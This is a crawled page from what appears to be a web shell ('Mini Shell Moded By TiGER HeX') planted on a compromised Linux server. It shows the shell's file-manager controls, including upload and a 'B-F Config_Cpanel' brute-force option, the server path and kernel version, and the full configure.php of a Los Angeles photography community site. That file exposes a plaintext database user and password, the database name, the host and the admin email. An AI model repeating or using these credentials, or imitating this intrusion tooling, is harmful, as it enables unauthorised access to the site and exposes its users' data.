Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
mnt
/
volume_sfo2_01
/
50mmla
/
includes
/
static
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
/mnt/volume_sfo2_01/50mmla/includes/static/configure.php
<? define('DATABASE_USER','dbuser'); define('DATABASE_PASS','1mTruc41nONTHRU'); define('ROOT_DIR','/var/www/50mmla'); define('ROOT_URL','http://www.50mmlosangeles.com'); define('DATABASE_HOST','localhost'); define('DATABASE','db279022336'); define('SITE_TITLE','50mm Los Angeles'); //how long a users displays as online in seconds ie 14400 = 60 * 60 * 4 = 4 hours define('SESS_LIFE',57600); define('SESS_STORAGE','14400');//options are MYSQL or '' for file system default define('ADMIN_EMAIL','info@50mmlosangeles.com'); define('WATERMARK_FILE',ROOT_DIR.'/images/50mmwatermark.jpg'); define('TAG_LIMG_PATH',ROOT_DIR."/images/tags/large/"); define('TAG_SIMG_PATH',ROOT_DIR."/images/tags/small/"); //images //includes images for events,articles,and legends define('STORY_LIMG_DIR','/images/stories/large/'); define('STORY_SIMG_DIR','/images/stories/small/'); define('LEGEND_IMG_WIDTH',700); define('LEGEND_IMG_HEIGHT',700); define('LEGEND_MAX_KB',2500); define('LEGEND_THUMB_WIDTH',200); define('LEGEND_THUMB_HEIGHT',200); define('LEGEND_NUM_HOME',3); define('ARTICLE_IMG_WIDTH',700); define('ARTICLE_IMG_HEIGHT',700); define('ARTICLE_MAX_KB',2500); define('ARTICLE_THUMB_WIDTH',200); define('ARTICLE_THUMB_HEIGHT',200); define('ARTICLE_NUM_HOME',3); define('EVENT_IMG_WIDTH',700); define('EVENT_IMG_HEIGHT',700); define('EVENT_MAX_KB',1500); define('EVENT_THUMB_WIDTH',200); define('EVENT_THUMB_HEIGHT',200); define('EVENT_NUM_HOME',4); //black book images define('BOOK_IMGS',36);//number of gallery thumbs to show per pagination page define('BOOK_LIMG_DIR','/images/tags/large/'); define('BOOK_SIMG_DIR','/images/tags/small/'); define('BOOK_VOTES_REQUIRED',3);//number of votes required before displayed in top flicks define('BOOK_VOTE_SAMPLE_DAYS',40);//number of days the top flicks are sampled from define('BOOK_NUM_RECENT',80); define('BOOK_NUM_TOP',120); //gallery images define('GALLERY_LIMG_DIR','/images/gallery/large/'); define('GALLERY_SIMG_DIR','/images/gallery/small/'); define('GALLERY_IMG_WIDTH',700);//max width define('GALLERY_IMG_HEIGHT',700);//max height define('LANDSCAPE_WIDTH',700);//max height define('LANDSCAPE_HEIGHT',325);//max height define('LANDSCAPE_TOLERENCE',600);//min width accepted define('PORTRAIT_WIDTH',550); define('PORTRAIT_HEIGHT',850); define('PORTRAIT_TOLERENCE',550);//min height accepted define('GALLERY_THUMB_WIDTH',80); define('GALLERY_THUMB_HEIGHT',80); define('GALLERY_MAX_KB',1600); define('GALLERY_SCROLL_HEIGHT',2000);//scroll any images with a height greater than this define('GALLERY_SCROLL_WIDTH',700);//scroll any images with a width greater than this define('GALLERY_IMGS_PER_PAGE',98);//number of gallery thumbs to show per pagination page //profile images define('PROFILE_IMG_DIR','/images/profiles/'); define('PROFILE_IMG_WIDTH',700); define('PROFILE_IMG_HEIGHT',700); define('PROFILE_MAX_KB',250);//maximum image size upload in KB //forum images define('FORUM_LIMG_DIR','/images/forums/large/'); define('FORUM_SIMG_DIR','/images/forums/small/'); define('FORUM_IMG_WIDTH',700); define('FORUM_IMG_HEIGHT',700); define('FORUM_THUMB_WIDTH',150); define('FORUM_THUMB_HEIGHT',150); define('FORUM_MAX_KB',500); define('FORUM_LIFE',900); //how long a thread will last if not replied to in days define('RESULTS_PER_PAGE',10);//number of results to show per pagination page define('FORUMS_PER_PAGE',100);//number of forums to show per pagination page define('IMG_QUALITY',70); define('POLL_LIFE',6);//how often a user can vote on a poll measured in hours define('GALLERY_VOTES_REQUIRED',3);//number of votes required before displayed in top flicks define('GALLERY_VOTE_SAMPLE_DAYS',30);//number of days the top flicks are sampled from define('BAD_WORD_STRING',"!@#$?");//this string replaces all dirty words as defined in the back end //$allowed_images = Array("gif","jpeg","pjpeg");//this is not extensions but mime types //$allowed_audio = Array(); //$allowed_video = Array(); //$allowed_file_types = Array("image"=>$allowed_images,"audio"=>$allowed_audio,"video"=>$allowed_video); $allowed_file_types = Array("image/gif","image/jpeg","image/pjpeg"); $month_array = Array(); $month_array["01"]="January"; $month_array["02"]="February"; $month_array["03"]="March"; $month_array["04"]="April"; $month_array["05"]="May"; $month_array["06"]="June"; $month_array["07"]="July"; $month_array["08"]="August"; $month_array["09"]="September"; $month_array["10"]="October"; $month_array["11"]="November"; $month_array["12"]="December"; $vote_array = Array(); array_push($vote_array,"Rate This Photo..."); array_push($vote_array,"Toy"); array_push($vote_array,"Aight"); array_push($vote_array,"It's Solid"); array_push($vote_array,"The Shit"); array_push($vote_array,"Legendary"); ?>